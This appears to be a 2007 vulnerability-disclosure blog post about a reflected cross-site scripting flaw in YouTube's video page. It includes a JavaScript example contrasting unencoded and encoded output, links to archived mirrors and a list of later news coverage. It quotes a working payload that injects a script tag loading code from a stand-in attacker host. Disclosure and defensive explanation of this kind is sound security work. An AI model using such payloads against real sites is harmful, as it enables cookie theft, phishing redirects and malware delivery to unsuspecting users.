
 YouTube XSS celebrates one month of age

Written by DP

Thursday, 6 December 2007

YouTube is currently the fourth most visited website on the planet according to Alexa. With more than 100 million video views every day, visitors are at great risk from a serious cross-site scripting vulnerability that has affected YouTube for a month already. It is a query string XSS that appears in the video viewing page. It works only with IE and probably Konqueror. Malicious people can use it to spread malware, steal cookie-based authentication credentials and redirect unaware users to phishing scam pages.


The following vector works successfully:
"><script/src=http://attacker/malware.js>

Mirrors of YouTube XSS vulnerabilities:
http://www.xssed.com/mirror/25330/  - Worked from 07/11/07 until fixed on 21/12/2007
http://www.xssed.com/mirror/7109/  - Fixed
http://www.xssed.com/mirror/5681/  - Fixed
http://www.xssed.com/mirror/197/  - Fixed
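
The query string XSS described above comes down to a request parameter being written into the page without output encoding. The following is an added example, not code from this article or from YouTube: it assumes a hypothetical parameter "q" reflected into a double-quoted attribute (the function names are hypothetical too) and shows the unencoded rendering next to an attribute-encoded one, using the vector quoted in this article as input.

```javascript
// Added example. The "q" parameter, the <input> template and all function
// names are assumptions for illustration; only VECTOR comes from the article.
const VECTOR = '"><script/src=http://attacker/malware.js>';

// Encode a value for use inside a quoted HTML attribute: every character
// that can close the attribute or open a tag becomes an entity.
function escapeAttr(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Read the reflected parameter from a raw query string (URL-decoded).
function getParam(query) {
  return new URLSearchParams(query).get('q') || '';
}

// Vulnerable pattern: the decoded value is concatenated into the markup,
// so a leading "> ends the attribute and the tag.
function renderUnsafe(query) {
  return '<input type="text" name="q" value="' + getParam(query) + '">';
}

// Hardened pattern: same template, value encoded for the attribute context.
function renderSafe(query) {
  return '<input type="text" name="q" value="' + escapeAttr(getParam(query)) + '">';
}

// Demo-only check: does the markup contain the start of a script element?
// A slash after the tag name is accepted because the vector uses "/src".
function hasScriptTag(html) {
  return /<script[\s\/>]/i.test(html);
}

// Constructed request: the vector as it would arrive, percent-encoded.
const query = 'q=' + encodeURIComponent(VECTOR);

console.log('unsafe:', renderUnsafe(query), '-> script tag:', hasScriptTag(renderUnsafe(query)));
console.log('safe:  ', renderSafe(query), '-> script tag:', hasScriptTag(renderSafe(query)));
```

The encoding shown fits a quoted attribute value only; a value reflected into a script block, a URL or an unquoted attribute needs the encoding for that context.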

Please, YouTube, resolve this issue! I do not want malicious people to steal the cookies of my grandmother watching "The Joy of Painting" by Bob Ross! :)
 
Related News about YouTube XSS attacks worth reading (Updated *6 July 2010* 11:45pm):

"Youtube HTML Code Injection" - 3 July 2010 - TinKode - InSecurityRomania (ISR)
"YouTube XSS Vulnerability Fixed [Official Statement]" - 4 July 2010 - Pallab De - Techie-Buzz.com
"Stored XSS vulnerability on YouTube actively abused?" - 4 July 2010 - Bojan Zdrnja - SANS Internet Storm Center
"Dangerous XSS Bug Found on YouTube" - 5 July 2010 - Lucian Constantin - SoftPedia (Only this news article credits TinKode)
"YouTube vuln pwns Justin Bieber fans" - 5 July 2010 - John Leyden - The Register
"Dangerous XSS vulnerability found on YouTube – the vulnerability explained" - 6 July 2010 - Jeremy Pullicino - Acunetix

 


        